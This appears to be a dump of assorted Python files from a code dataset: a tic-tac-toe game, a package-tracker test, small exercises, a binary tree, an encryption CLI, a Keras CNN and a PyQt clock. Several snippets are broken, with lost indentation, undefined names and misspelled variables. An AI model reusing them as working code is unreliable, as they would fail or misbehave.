    marks_placed = board.count('X') + board.count('O')
    return marks_placed == 9
def player_choice(board):
    """Prompt until the player names a free position 1-9; return it.

    Robustness fix: non-numeric input used to crash with ValueError in
    int(); it now simply re-prompts.
    """
    position = None
    # `position not in ...` short-circuits before space_check sees None.
    while position not in [1, 2, 3, 4, 5, 6, 7, 8, 9] or not space_check(board, position):
        try:
            position = int(input('Choose a position (1-9)'))
        except ValueError:
            position = None
    return position
def replay():
    """Ask whether to start another game; True when the answer is Y."""
    answer = input("Play again? (Y)").upper()
    return answer == 'Y'
if __name__ == "__main__":
print('Welcome to Tic Tac Toe!')
while True:
# Set up the game
board = ['#'] + [' ']*9
# Player 1 choose either X or O
players = player_input()
# Who's turn first
turn = choose_first() # 0 player 1 1 player 2
print(f"Player {turn+1} goes first")
play_game = input('Ready to play (Y)? ').upper()
if play_game == 'Y':
game_on = True
else:
game_on = False
while game_on:
display_board(board)
for i in range (turn,2):
print(f"Your turn Player {i+1}")
position = player_choice(board)
if space_check(board, position):
place_marker(board, players[i], position)
display_board(board)
if win_check(board, players[i]):
if i:
print(f"Congratulations Player 2")
else:
print(f"Congratulations Player 1")
break
turn = 0
if full_board_check(board) or win_check(board, 'X') or win_check(board, 'O') :
break
if not replay():
break | true |
091824f44461290479800b6f5b33923bcfead9d0 | Python | LibriCerule/Cerulean_Tracking | /db_unittest.py | UTF-8 | 1,461 | 2.59375 | 3 | [
"MIT"
] | permissive | from tracker_database import TrackerDatabase
# Fixed UUIDs shared by the manual test routines below.
test_uuid = "de305d54-75b4-431b-adb2-eb6b9e546014"
test_uuid2 = "de305d54-75b4-431b-adb2-eb6b9e546015"
def test_track_new_package():
    """Smoke-test package creation, location updates, and retrieval."""
    test_name = "4401 Wilson Blvd #810, Arlington, VA 22203"
    test_lat = 0
    test_lon = 0
    test_delivered = False  # NOTE(review): unused -- possibly leftover
    # NOTE(review): a UTC offset of -25:00 is not a valid timezone -- confirm
    # whether the database is expected to accept it.
    test_time = "2015-12-08T08:42:33.188-25:00"
    testdb = TrackerDatabase("unittest.db")
    # Register two packages, then push location updates for both.
    testdb.track_new_package(test_name, test_uuid, test_lat, test_lon)
    testdb.track_new_package(test_name, test_uuid2, test_lat, test_lon)
    testdb.package_track_update(test_uuid, test_lat, test_lon, test_time)
    testdb.package_track_update(test_uuid2, test_lat, test_lon, test_time)
    # Single-argument form; presumably marks delivered=False -- confirm API.
    testdb.package_track_update(test_uuid, False)
    a = testdb.get_package(test_uuid)
    b = testdb.get_package_updates(test_uuid)
    print(b)
    # Dump updates as JSON-ish records for manual inspection.
    print(",".join("{\"uuid\":%s, \"lat\":%s, \"lon\":%s, \"timestamp\":%s}" %(update[0], update[1], update[2], update[3]) for update in b))
    #print(b)
def test_login():
    """Exercise user registration, login, and package-to-user linking."""
    testdb = TrackerDatabase("unittest.db")
    testdb.register_user("hee", "hoo")
    # NOTE(review): logs in with a different password ("hah") than was
    # registered ("hoo"); presumably exercising the failure path -- confirm.
    if testdb.log_in("hee", "hah"):
        print("Login works!")
    else:
        print("Login failed")
    testdb.register_package_to_user("hee", test_uuid)
    testdb.register_package_to_user("hee", test_uuid2)
    #print(testdb.get_package_of_user("admin"))
def main():
    """Run both manual test routines against unittest.db."""
    test_track_new_package()
    test_login()
if __name__ == "__main__":
    main()
| true |
ac9947fe8f632200c831439009a2610e6673dc1a | Python | ashutoshdhondkar/basic-python | /comprehension_exercise.py | UTF-8 | 498 | 4.3125 | 4 | [] | no_license | #Wap to check whether an input number is multiple of 5 and is greater than 17
'''
#without comprehension
ip=int(input("Enter a number : "))
if(ip%5==0) and (ip>17):
print("Satisfied")
else:
print("Not satisfied")
'''
# with comprehension
def check(num):
    """Return True for multiples of 5 that are strictly greater than 17."""
    return num % 5 == 0 and num > 17
lis = [10, 15, 20, 17, 30, 18]
# The original wrapped filter(lambda ...) in a comprehension, duplicating the
# predicate already defined above; reuse check() in a plain conditional
# comprehension instead (same output: [20, 30]).
nl = [x for x in lis if check(x)]
print(nl)
| true |
ef9c01c7d62edf3c170a2bfb2f79545e9fac4a22 | Python | minbbaevw/multi.plus.py | /main.py | UTF-8 | 1,375 | 4.34375 | 4 | [] | no_license | # Дан массив целых чисел. Нужно найти сумму элементов с четными индексами (0-й, 2-й, 4-й итд), затем перемножить эту сумму и последний элемент исходного массива. Не забудьте, что первый элемент массива имеет индекс 0.
# Для пустого массива результат всегда 0 (ноль).
# Входные данные: Список (list) целых чисел (int).
# Выходные данные: Число как целочисленное (int).
def multi_plus(array):
"""
sums even-indexes elements and multiply at the last
"""
if len(array) == 0:
return False
s = 0
for i in range(len(array)):
if i % 2 == 0:
s = s + array[i]
return s * array[-1]
#These "asserts" using only for self-checking and not necessary for auto-testing
if __name__ == '__main__':
print('Example:')
print(multi_plus([0, 1, 2, 3, 4, 5]))
assert multi_plus([0, 1, 2, 3, 4, 5]) == 30, "(0+2+4)*5=30"
assert multi_plus([1, 3, 5]) == 30, "(1+5)*5=30"
assert multi_plus([6]) == 36, "(6)*6=36"
assert multi_plus([]) == 0, "An empty array = 0"
print("Coding complete? Click 'Check' to review your tests and earn cool rewards!") | true |
2b1a6f8ddbeb857738b34659c2da131f3c627ce1 | Python | subicWang/leetcode_aotang | /tools/binarytree.py | UTF-8 | 3,592 | 3.5 | 4 | [] | no_license | # -*- coding: utf-8 -*-
"""
Aouther: Subic
Time: 2019/8/28: 10:08
"""
from collections import Iterable
import networkx as nx
import matplotlib.pyplot as plt
class Node(object):
def __init__(self, value, left=None, right=None):
self.val = value
self.left = left
self.right = right
class BinaryTree(object):
def __init__(self, seq=()):
assert isinstance(seq, Iterable)
self.root = None
self.seq = []
def _create_balance_binary_tree(self, *args):
if not args:
return
if not self.root:
self.root = Node(args[0])
args = args[1:]
for i in args:
seed = self.root
while True:
if i > seed.val:
if not seed.right:
node = Node(i)
seed.right = node
break
else:
seed = seed.right
else:
if not seed.left:
node = Node(i)
seed.left = node
break
else:
seed = seed.left
def level_order(self):
res = []
if self.root is None:
return res
q = [self.root]
while len(q):
r = q.pop(0)
if r.left:
q.append(r.left)
if r.right:
q.append(r.right)
res.append(r.value)
return res
def first_order(self, root):
if not root:
return None
self.seq.append(root.val)
self.first_order(root.left)
self.first_order(root.right)
def mid_order(self, root):
if not root:
return None
self.mid_order(root.left)
self.seq.append(root.val)
self.mid_order(root.right)
def last_order(self, root):
if not root:
return None
self.last_order(root.left)
self.last_order(root.right)
self.seq.append(root.val)
def create_level_tree(self, *args):
args = list(args)
if not args:
return None
if not self.root:
self.root = Node(args[0])
args = args[1:]
Nodes = [self.root]
while len(args) != 0:
r = Nodes.pop(0)
if r:
if r.left is None:
node = Node(args.pop(0))
r.left = node
Nodes.append(node)
if r.right is None:
node = Node(args.pop(0))
r.right = node
Nodes.append(node)
def create_graph(G, node, pos, x=0, y=0, layer=1):
pos[node.value] = (x, y)
if node.left:
G.add_edge(node.val, node.left.val)
l_x, l_y = x - 1/2 ** layer, y-1
l_layer = layer + 1
create_graph(G, node.left, pos, l_x, l_y, layer=l_layer)
if node.right:
G.add_edge(node.val, node.right.val)
r_x, r_y = x + 1/2 ** layer, y-1
r_layer = layer + 1
create_graph(G, node.right, pos, r_x, r_y, layer=r_layer)
return G, pos
def draw(node):
graph = nx.DiGraph()
graph, pos = create_graph(graph, node, pos={})
fig, ax = plt.subplots(figsize=(8, 8))
nx.draw_networkx(graph, pos, ax, node_size=500)
plt.show()
if __name__ == "__main__":
s = [10, 20, 30, 40, 50]
tree = BinaryTree()
tree.create_level_tree(*s)
draw(tree.root)
# tree.first_order(tree.root)
# print(tree.seq)
| true |
fa95b14cee4d49c0e64817a0e6c43c222f6fc9fb | Python | andreas19/pygemina | /src/gemina/__main__.py | UTF-8 | 3,156 | 2.84375 | 3 | [
"BSD-3-Clause"
] | permissive | # flake8: noqa
"""Usage:
gemina encrypt -i INFILE -o OUTFILE [-V N] (-p | -k) [INPUT]
gemina decrypt -i INFILE -o OUTFILE (-p | -k) [INPUT]
gemina verify -i INFILE (-p | -k) [INPUT]
gemina create -o OUTFILE [-V N]
Commands:
encrypt encrypt a file
decrypt decrypt a file
verify verify a file
create create a secret key
Argument:
INPUT password or keyfile
if omitted it will be asked for (password w/o echoing)
Options:
-i INFILE --input INFILE input file
-o OUTFILE --output OUTFILE output file
-V N format version (N: one of 1, 2, 3, 4) [default: 1]
-p --password use password
-k --keyfile use keyfile
-h --help show this help
--version show the version
"""
import sys
from getpass import getpass
from salmagundi.files import read_all, write_all
from salmagundi.utils import docopt_helper
from . import *
from . import __version__
def _version_conv(n):
n = int(n)
if n == 1:
return Version.V1
if n == 2:
return Version.V2
if n == 3:
return Version.V3
if n == 4:
return Version.V4
raise ValueError('version must be one of 1, 2, 3, 4')
def _get_input(passwd):
try:
in_put = getpass() if passwd else input('Keyfile: ')
if not in_put:
sys.exit('no input')
return in_put
except EOFError:
print()
sys.exit()
def main():
"""Main function."""
args = docopt_helper(__doc__, version=__version__,
converters={'-V': _version_conv})
try:
if args['create']:
write_all(args['--output'],
create_secret_key(version=args['-V']), True)
else:
if not args['INPUT']:
in_put = _get_input(args['--password'])
else:
in_put = args['INPUT']
indata = read_all(args['--input'], True)
if args['encrypt']:
if args['--password']:
outdata = encrypt_with_password(in_put.encode(),
indata, version=args['-V'])
else:
outdata = encrypt_with_key(read_all(in_put, True),
indata, version=args['-V'])
write_all(args['--output'], outdata, True)
elif args['decrypt']:
if args['--password']:
outdata = decrypt_with_password(in_put.encode(), indata)
else:
outdata = decrypt_with_key(read_all(in_put, True), indata)
write_all(args['--output'], outdata, True)
else: # verify
if args['--password']:
ok = verify_with_password(in_put.encode(), indata)
else:
ok = verify_with_key(read_all(in_put, True), indata)
if ok:
print('verified')
else:
sys.exit('NOT verified')
except KeyboardInterrupt:
print()
except Exception as ex:
sys.exit(ex)
if __name__ == '__main__':
main()
| true |
8ee17ccebc20de05c3e6e1b868ea89d7a4597738 | Python | dwtrain/Gitpractice | /calc.py | UTF-8 | 320 | 3.515625 | 4 | [] | no_license | def add(x,y):
return x+y
def sub(x,y):
return x-y
def mult(x,y):
return x*y
def divide(x,y):
if(y==0):
return NULL
else:
return x/y
def mod(x,n):
return x%n
print('these are math operations')
print(add(2,4))
print(sub(2,4))
print(mult(2,4))
print(divide(2,4))
print(mod(2,4))
| true |
108565a87cf38864a7ced4482f9753a2a9159475 | Python | 499244188/Python | /1datetime.py | UTF-8 | 1,448 | 3.625 | 4 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Wed Apr 13 14:06:18 2017
@author: Z
"""
from datetime import datetime
now = datetime.now()
print(now)
print(type(now))
#指定时间日期
dt = datetime(2017,5,4,23,1)
print(dt)
dt.timestamp()#把datatime转为timestamp
t = 3600*24*360*48-3600*24*11
print(datetime.fromtimestamp(t))
t = 1493910060.0
print(datetime.fromtimestamp(t))#本地时间
print(datetime.utcfromtimestamp(t))#UTC时间
#str转为datetime
cday = datetime.strptime('2015-6-1 18:19:59', '%Y-%m-%d %H:%M:%S')
print(cday)
#datetime转为str
now=datetime.now()
print(now.strftime('%A,%b %d %H:%M'))
#datetime 加减
from datetime import datetime,timedelta
now = datetime.now()
now+timedelta(hours=10)
now-timedelta(days = 19)
now + timedelta(days=2,hours=13)
#本地时间转UTC时间
from datetime import timezone
tz_utc_8 = timezone(timedelta(hours=8))
now = datetime.now()
dt = now.replace(tzinfo=tz_utc_8) #强制设置为UTC+8:00
#时区转换
#拿到utc时间,并强制设置时区为utc+0:00
utc_td = datetime.utcnow().replace(tzinfo=timezone.utc)
#astimezone()将时区转换为北京时间
bj_dt = utc_td.astimezone(timezone(timedelta(hours=8)))
print(bj_dt)
#astimezone 将时区转为东京时间:
tokyo_dt = utc_td.astimezone(timezone(timedelta(hours=9)))
print(tokyo_dt)
#astimezone() 将北京时区换位东京时间
tokyo_dt2 = bj_dt.astimezone(timezone(timedelta(hours=9)))
| true |
58b8f72c633407e708f248f6cc3d1fd931d7540c | Python | Dharian/pythonProject | /Ejercicios/Listas/Ejercicio 9 LIstas.py | UTF-8 | 404 | 3.796875 | 4 | [
"MIT"
] | permissive | def cargarLista():
lista=[]
for x in range(5):
lista.append(str(input("Ingresa tus cinco palabras favoritas")))
print(lista[x])
comprobarLongitud(lista)
def comprobarLongitud(lista):
for elemento in lista:
if len(elemento) > 5:
print(elemento)
else:
print("la palabra ", elemento, " no tiene más de cinco caracteres")
cargarLista()
| true |
7b6c0519f2e32876ba7e16973eb7f88672eed47a | Python | sekunder/SWDB-KART | /pca/main.py | UTF-8 | 1,344 | 3.328125 | 3 | [] | no_license | from sklearn.preprocessing import StandardScaler
import numpy as np
def pca(X, ndims=3):
"""Runs PCA on provided data, X, and returns the projection onto ndims principal components.
This function assumes X has data series in columns.
This function also returns the covariance matrix of the data (scaled to zero norm and unit variance), as well as the eigen vectors and values of that matrix.
Input:
X : ndarray with data series in columns (e.g. one neuron's calcium trace (or DF/F) per column)
ndims : the number of dimensions to project down to. Default is 3 for fancy 3d scatter plots.
Output:
Y : Projected, scaled data.
cov_mat : Covariance matrix of the scaled data
eig_pairs : a list of tuples. Each tuple is of the form (eigen value, eigen vector), and they are sorted high to low"""
original_dims = X.shape[1];
if ndims > original_dims:
ndims = original_dims
#TODO Check what this scaler is actually doing; it might be scaling columns independently
X_std = StandardScaler().fit_transform(X)
cov_mat = np.cov(X.T)
eig_vals, eig_vecs = np.linalg.eig(cov_mat)
eig_pairs = [(np.abs(eig_vals[i]), eig_vecs[:, i]) for i in range(len(eig_vals))]
eig_pairs.sort(key=lambda x: x[0], reverse=True)
W = np.hstack((eig_pairs[i][1].reshape(original_dims,1) for i in range(ndims)))
Y = X_std.dot(W)
return Y, cov_mat, eig_pairs
| true |
45fdf75a9b30b797f1090d38a62c184c9e204a3d | Python | BartlomiejCiurus/PythonClasses | /Functions/4.2.py | UTF-8 | 841 | 3.65625 | 4 | [] | no_license | __author__ = 'Bartek'
def print_ruler(number):
ruler = ""
limiter = " "
counter = 0
border_value = 10
for i in range(1, number):
ruler += "|...."
ruler += "|\n"
for character in ruler:
if character == '|':
ruler += str(counter)
counter += 1
if counter >= border_value:
border_value *= 10
limiter = limiter[:(len(limiter) - 1)]
ruler += limiter
return ruler
def print_rectangle(width, height):
horizontal_line = "+---" * width + "+\n"
vertical_line = "| " * width + "|\n"
result = ""
for counter in range(0, height * 2):
if counter % 2 == 0:
result += horizontal_line
else:
result += vertical_line
result += horizontal_line
return result
| true |
b3ec75f76aa090dab2d5fd8237b9d7ffc6b981f9 | Python | gdurin/Python-in-the-lab | /problems/plot3D_withcolors.py | UTF-8 | 580 | 2.765625 | 3 | [
"CC-BY-3.0"
] | permissive | import numpy as np
import pandas as pd
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
from matplotlib import colors as mcolors
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
data = pd.read_csv("output_point.csv", names=['x','y','z','R','G','B'])
c = [mcolors.to_hex([r/255,g/255,b/255]) for r,g,b in zip(data.R, data.G, data.B)]
# ax.scatter(data.x, data.y, data.z, 'o', c=c)
data = np.random.random((500,6))
c = [mcolors.to_hex([r,g,b]) for r,g,b in data[:,3:]]
ax.scatter(data[:,0], data[:,1], data[:,2], 'o', c=c, s=25)
plt.show()
| true |
c690610208b79cb822ddbf41ce7fd9a407d8b00c | Python | haribogummi/test | /anotation1.py | UTF-8 | 907 | 2.578125 | 3 | [] | no_license | # coding: UTF-8
import re
import sys
import csv
def position():
dic1={}
dic2={}
f=open("snp_test.csv","rb")
datareader = csv.reader(f)
for row in datareader:
dic2={row[1]:row[2]}
dic1.update(dic2)
return dic1
f.close()
def search():
dic1=position()
c=0
print "Position,Nuc,n_p,Start,End,Type"
for k,v in dic1.iteritems():
f=open("gfftest.gff","r")
lines = f.readlines()
for line in lines:
if re.match("#",line) == None:
line=line.rstrip("\n")
line=line.split("\t")
result=()
if int(k) >= int(line[3]) and int(k) <= int(line[4]):
print k+","+v+","+line[5]+","+line[3]+","+line[4]+","+line[2]
##問題点 +-がででこない(表記の問題?) chromeson を書き出さない条件分布ないしgene,sRNAなどのTypeをまとめる方法が必要
# f.close()
##---------------------------------##
if __name__ == '__main__':
position()
search()
| true |
47a53542ffae6efd469c633154fe5af425a87af9 | Python | baez97/shonen | /Source Code/Estado.py | UTF-8 | 1,877 | 3.109375 | 3 | [] | no_license | import pygame
from pygame.locals import *
class Estado:
def pintar(self, personaje):
self.grafico.pintar(personaje)
def getImage(self):
return self.image
def isUp(self):
return False
def isDown(self):
return False
def isRight(self):
return False
def isLeft(self):
return False
class Parado(Estado):
def __init__(self, personaje):
self.image = pygame.image.load(personaje.imagenes['parado'])
self.grafico = personaje.getGrafico().parado
def avanza(self, personaje):
pass
"""class MovingRight(Estado):
def avanza(self, grafico):
new_pos_x = self.pos_x + 5
if new_pos_x + 120 < 600:
self.pos_x = new_pos_x
self.currentImage = grafico.right
self.img_rect = self.img_rect.move((5, 0))
else
self.currentImage = grafico.parado"""
class MovingLeft(Estado):
def __init__(self, personaje):
self.image = pygame.image.load(personaje.imagenes['left'])
def avanza(self, personaje):
personaje.moveLeft()
def isLeft(self):
return True
class MovingRight(Estado):
def __init__(self, personaje):
self.image = pygame.image.load(personaje.imagenes['right'])
def avanza(self, personaje):
personaje.moveRight()
def isRight(self):
return True
class MovingUp(Estado):
def __init__(self, personaje):
self.image = pygame.image.load(personaje.imagenes['up'])
def avanza(self, personaje):
personaje.moveUp()
def isUp(self):
return True
class MovingDown(Estado):
def __init__(self, personaje):
self.image = pygame.image.load(personaje.imagenes['down'])
def avanza(self, personaje):
personaje.moveDown()
def isDown(self):
return True
| true |
8e5f4d6addb9f956efb0907c36dd4f69e8f12635 | Python | yellowrangler/vue | /systemscripts/putvue.py | UTF-8 | 811 | 2.96875 | 3 | [] | no_license | #!/usr/bin/env python
#!/usr/bin/env python3
import sys
import subprocess
import glob
# global variables
mysqlcommand = "mysql -u tarryc -p vue < "
file_list = []
cmd = "no file selected"
file_list = glob.glob('vue-*python.sql')
l = len(file_list)
i = 0
while (i < l):
name = file_list[i]
print name
answer = raw_input('Do you want to use this file to update vue database (yes/no) ?')
Fl = answer[0].lower()
if Fl == 'y':
cmd = mysqlcommand + name
break;
i += 1
print "The following command will now be run, ok? (yes/no)"
print cmd
answer = raw_input('Do you want to use this file to update vue database (yes/no) ?')
Fl = answer[0].lower()
if Fl == 'y':
returned_value = subprocess.call(cmd, shell=True) # returns the exit code in unix
print'returned value:', returned_value
quit() | true |
5c89f0b24ef920a2fa5c9b2cbd372881868bbb1f | Python | yeasin50/Traffic-Sign-Classification | /traffic_sign_net.py | UTF-8 | 3,371 | 2.765625 | 3 | [] | no_license | #!/usr/bin/env python
# coding: utf-8
# # <center> TrafficSignNet
# Conv2D
# input: (None, 32, 32, 3)
# output: (None, 32, 32, 8)
#
# Activation
# input: (None, 32,32,8)
# output: (None, 32,32,8)
#
# BatchNormalization
# input: (None, 32, 32, 8)
# output: (None, 32, 32, 8)
#
# MaxPooling2D
# input: (None, 32, 32, 8)
# output: (None, 16, 16, 8)
#
# In[2]:
#necessary packages
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import BatchNormalization
from tensorflow.keras.layers import Conv2D
from tensorflow.keras.layers import MaxPooling2D
from tensorflow.keras.layers import Activation
from tensorflow.keras.layers import Dense
from tensorflow.keras.layers import Flatten
from tensorflow.keras.layers import Dropout
# In[3]:
class TrafficSignNet:
def build(width, height, channel, classes):
#init model
model = Sequential()
inputShape = (height, width, channel)
chanDim = -1
# if we are using "channels first", update the input shape and channels dimension
if backend.image_data_format()== "channels_first":
inputShape =(channel , height, width)
chanDim = 1
print("got: rev onn backend")
# CONV => RELU => BN => POOL
model.add(Conv2D(8, (5, 5), padding="same", input_shape= inputShape))
# 5×5 kernel to learn larger features
# distinguish between different traffic sign shapes and color blobs
model.add(Activation("relu"))
model.add(BatchNormalization(axis= chanDim))
model.add(MaxPooling2D(pool_size=(2, 2)))
#(CONV => RELU => CONV => RELU) * 2 => POOL layers:
model.add(Conv2D(16, (3, 3), padding="same"))
model.add(Activation("relu"))
model.add(BatchNormalization(axis= chanDim))
model.add(Conv2D(16, (3, 3), padding="same"))
model.add(Activation("relu"))
model.add(BatchNormalization(axis= chanDim))
model.add(MaxPooling2D(pool_size=(2, 2)))
# second set of (CONV => RELU => CONV => RELU) * 2 => POOL
model.add(Conv2D(32, (3, 3), padding="same"))
model.add(Activation("relu"))
model.add(BatchNormalization(axis= chanDim))
model.add(Conv2D(32, (3, 3), padding="same"))
model.add(Activation("relu"))
model.add(BatchNormalization(axis=chanDim))
model.add(MaxPooling2D(pool_size=(2, 2)))
#The head of our network consists of two sets of fully connected layers and a softmax classifier
# first set of FC => RELU layers
model.add(Flatten())
model.add(Dense(128))
model.add(Activation("relu"))
model.add(BatchNormalization(axis= chanDIm))
model.add(Dropout(0.5))
# second set of FC => RELU layers
model.add(Flatten())
model.add(Dense(128))
model.add(Activation("relu"))
model.add(BatchNormalization(axis= chanDIm))
model.add(Dropout(0.5))
# softmax classifier
model.add(Dense(classes))
model.add(Activation("softmax"))
return model
## if you cant get this model goto https://github.com/yeasin50/startUP_CNN
# In[ ]:
| true |
098f3382a214dd08406eae9310623053599fd72a | Python | pheldox/Covid-19-Tweet-Classification | /app.py | UTF-8 | 2,293 | 3.0625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Mon Jul 6 21:37:09 2020
@author: Ayush
"""
# covid 19 tweets
import streamlit as st
import pickle
import numpy as np
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
from nltk.stem import WordNetLemmatizer
from PIL import Image
import re
def main():
html_temp = """
<div style="background-color:blue;padding:10px">
<h2 style="color:black;text-align:center;">Covid-19 Related Tweets Classification System</h2>
</div>
"""
st.markdown(html_temp , unsafe_allow_html= True)
image = Image.open('h1.jpeg')
st.image(image, use_column_width=True,format='PNG')
ps = PorterStemmer()
model = pickle.load(open('covid.pkl', 'rb'))
vec = pickle.load(open('vec.pkl', 'rb'))
def clean_text(text):
text = re.sub(pattern='[^a-zA-Z]', repl=' ', string=text)
text = text.lower()
#text = text.split()
#words = [word for word in words if word not in set(stopwords.words('english'))]
#words = [ps.stem(word) for word in words]
#text = ' '.join(text)
return text
st.markdown("<body style = 'background-color: white;'><h3 style = 'text-align: center; color :black;'> Enter the text to know weather Tweet is Covid-19 Related or Not </h3></body>", unsafe_allow_html = True)
text = st.text_input(" ", ' ')
text = clean_text(text)
if st.button('Predict'):
text_vec = vec.transform([text])
pred= model.predict(text_vec)
if pred== 0:
st.error('Not Covid-19 Related Tweets')
else:
st.info('Hey!! This Tweet is Related to Covid-19')
st.balloons()
#st.success('{}'.format(pred))
if st.button("Lets Get in Touch"):
st.text("Stay Home 💦 Stay Safe.")
st.text("Github link: https://github.com/ayushkesh/Covid-19-Tweet-Classification")
html_temp1 = """
<div style="background-color:blue">
<p style="color:white;text-align:center;"><b>Made with ❤️ by Ayush Kumar</b> </p>
</div>
"""
st.markdown(html_temp1,unsafe_allow_html=True)
if __name__ =='__main__':
main()
| true |
28803ddbabe66f9294d4cfb1e2780e5418ff49c4 | Python | kevjam/fake-news-classifier | /src/predict.py | UTF-8 | 2,428 | 2.625 | 3 | [] | no_license | from preprocess import filter_dataset
from utils.tokenizing import segment_zh_data, tokenize
from utils.storage import load_tokenizers
# -------------- General Packages --------------
# Data Manipulation
import pandas as pd
import numpy as np
# For Saving/Loading Files
import os
from keras.models import load_model
# For parsing command-line arguments
import argparse
# Prepare a dataset for preprocessing, returns ids and a preprocessed dataframe
def prepare(df, t_EN, t_ZH, EN_SENTENCE_SIZE=22, ZH_SENTENCE_SIZE=16):
df = filter_dataset(df, drop_columns=['tid1','tid2'], label_exists=False)
ids = df['id']
df = segment_zh_data(df.drop(columns=['id']))
df = tokenize(t_EN,t_ZH,df,EN_SENTENCE_SIZE,ZH_SENTENCE_SIZE,label_exists=False)
return ids,df
# Get predictions on a model
def get_predictions(df, model, EN_SENTENCE_SIZE=22, ZH_SENTENCE_SIZE=16):
class_predictions = model.predict([df.iloc[:,:EN_SENTENCE_SIZE*2],df.iloc[:,EN_SENTENCE_SIZE*2:]])
label_predictions = np.argmax(class_predictions, axis=1)
return label_predictions
if __name__== "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-m','--modeldir', help='Directory of the model to obtain metrics for', default='./best_model/BiLSTM.hdf5', type=str)
parser.add_argument('-i','--inputcsv', help='Directory for the input csv', default='./data/test.csv', type=str)
parser.add_argument('-o','--outputcsv', help='Directory for the output csv', default='./data/submission.csv', type=str)
args = parser.parse_args()
# Directories
MODEL_DIR = args.modeldir
TOKENIZER_DIR = './tokenizers/'
INPUT_CSV = args.inputcsv
# Load the necessary files
t_EN,t_ZH = load_tokenizers(TOKENIZER_DIR)
df = pd.read_csv(INPUT_CSV,encoding='utf-8-sig',error_bad_lines=False)
model = load_model(MODEL_DIR, compile=False)
# Prepare data for preprocessing and return ids/clean data
ids,df = prepare(df,t_EN,t_ZH)
# Get predictions of the dataset
label_predictions = get_predictions(df,model)
df_predictions = pd.DataFrame({'id':ids, 'label':label_predictions})
# Unencode the labels
map_dict = {0: 'unrelated', 1:'agreed', 2:'disagreed'}
df_predictions['label'] = df_predictions["label"].map(map_dict)
# Save predictions to a CSV
df_predictions.to_csv(args.outputcsv, index=False) | true |
08c7a5a38bf556feb2270064acae6082b1251ea3 | Python | junli-cs-fiu/spinner_public | /matrix.py | UTF-8 | 1,224 | 2.984375 | 3 | [] | no_license | import numpy as np
def Cauchy(m, n):
x = np.array(xrange(n + 1, n + m + 1))
y = np.array(xrange(1, n + 1))
x = x.reshape((-1, 1))
diff_matrix = x - y
cauchym = 1.0 / diff_matrix
return cauchym
def RS(n, k):
I = np.identity(k)
P = Cauchy(n - k, k)
return np.concatenate((I, P), axis = 0)
def RS_plus(n, k, N):
G = RS(n, k)
Ge = np.zeros((n * N, k * N))
for i in xrange(k * N):
Ge[i, i] = 1
for i in xrange(k, n):
for j in xrange(k):
for l in xrange(N):
Ge[i * N + l, j * N + l] = G[i, j]
return (Ge, list(xrange(0, k * N)))
def Global_RS(n, k, N):
G = RS(n * N, k * N)
return (G, list(xrange(0, k * N)))
def Carousel(n, k, W):
N = sum(W)
K = map(lambda x: x * k, W)
R = [0] * n
for i in xrange(1, n):
R[i] = (R[i - 1] + K[i - 1]) % N
Ge = RS_plus(n, k, N)[0]
index = [0] * (k * N)
count = 0
for i in xrange(n):
for j in xrange(K[i]):
index[count] = i * N + (R[i] + j) % N
count += 1
Ge = np.linalg.solve(Ge[index].T, Ge.T)
Ge = Ge.T
return (Ge, index)
if __name__ == "__main__":
print Cauchy(4,3)
print RS(5, 4)
| true |
92197a7af9b0cd9ba5a036f49b23cae7b1b182d4 | Python | jobafash/InterviewPrep | /educative.io/patterns/bfs/easy4.py | UTF-8 | 2,272 | 4.65625 | 5 | [] | no_license | '''
Given a binary tree, populate an array to represent the averages of all of its levels.
Solution#
This problem follows the Binary Tree Level Order Traversal pattern. We can follow the same BFS approach. The only difference will be that instead of keeping track of all nodes of a level, we will only track the running sum of the values of all nodes in each level. In the end, we will append the average of the current level to the result array.
'''
from collections import deque
class TreeNode:
def __init__(self, val):
self.val = val
self.left, self.right = None, None
def find_level_averages(root):
result = []
if root is None:
return result
queue = deque()
queue.append(root)
while queue:
levelSize = len(queue)
levelSum = 0.0
for _ in range(levelSize):
currentNode = queue.popleft()
# add the node's value to the running sum
levelSum += currentNode.val
# insert the children of current node to the queue
if currentNode.left:
queue.append(currentNode.left)
if currentNode.right:
queue.append(currentNode.right)
# append the current level's average to the result array
result.append(levelSum / levelSize)
return result
def main():
root = TreeNode(12)
root.left = TreeNode(7)
root.right = TreeNode(1)
root.left.left = TreeNode(9)
root.left.right = TreeNode(2)
root.right.left = TreeNode(10)
root.right.right = TreeNode(5)
print("Level averages are: " + str(find_level_averages(root)))
main()
'''
Time complexity#
The time complexity of the above algorithm is O(N)O(N)O(N), where ‘N’ is the total number of nodes in the tree. This is due to the fact that we traverse each node once.
Space complexity#
The space complexity of the above algorithm will be O(N)O(N)O(N) which is required for the queue. Since we can have a maximum of N/2N/2N/2 nodes at any level (this could happen only at the lowest level), therefore we will need O(N)O(N)O(N) space to store them in the queue.
Similar Problems#
Problem 1: Find the largest value on each level of a binary tree.
Solution: We will follow a similar approach, but instead of having a running sum we will track the maximum value of each level.
maxValue = max(maxValue, currentNode.val)
''' | true |
9b043b127f870220d33161f7b1a1cc229fd10b19 | Python | tcbrouwer/FourierMonitor | /HarmonicAI/main.py | UTF-8 | 384 | 2.9375 | 3 | [] | no_license | import random
import math
from FourierClerk import FourierClerk
clerk = FourierClerk(1000)
supervisor = FourierClerk(10)
print(clerk.get_coefficients_for_channel(0))
for i in range(0,2000):
clerk.note([math.sin(math.pi * i/10)])
#clerk.note([random.random()])
supervisor.note(clerk.get_coefficients_for_channel(0))
print(supervisor.get_coefficients_for_channel(0))
| true |
8c88611626c37a22dc1ca4ca4d76db530a61d8fe | Python | ProximaB/Control-of-a-mobile-robot-with-extrinsic-feedback | /Find_Detect_base/qt6clock.py | UTF-8 | 1,077 | 2.71875 | 3 | [] | no_license | import cv2
def start_webcam(self):
if not self.cameraRuns:
self.capture = cv2.VideoCapture(cv2.CAP_DSHOW)
self.cameraRuns = not self.cameraRuns
self.timer = QTimer(self)
self.timer.timeout.connect(self.update_frame)
self.timer.start(2)
from PyQt5.QtCore import QTime, QTimer
from PyQt5.QtWidgets import QApplication, QLCDNumber
class DigitalClock(QLCDNumber):
def __init__(self, parent=None):
super(DigitalClock, self).__init__(parent)
self.setSegmentStyle(QLCDNumber.Filled)
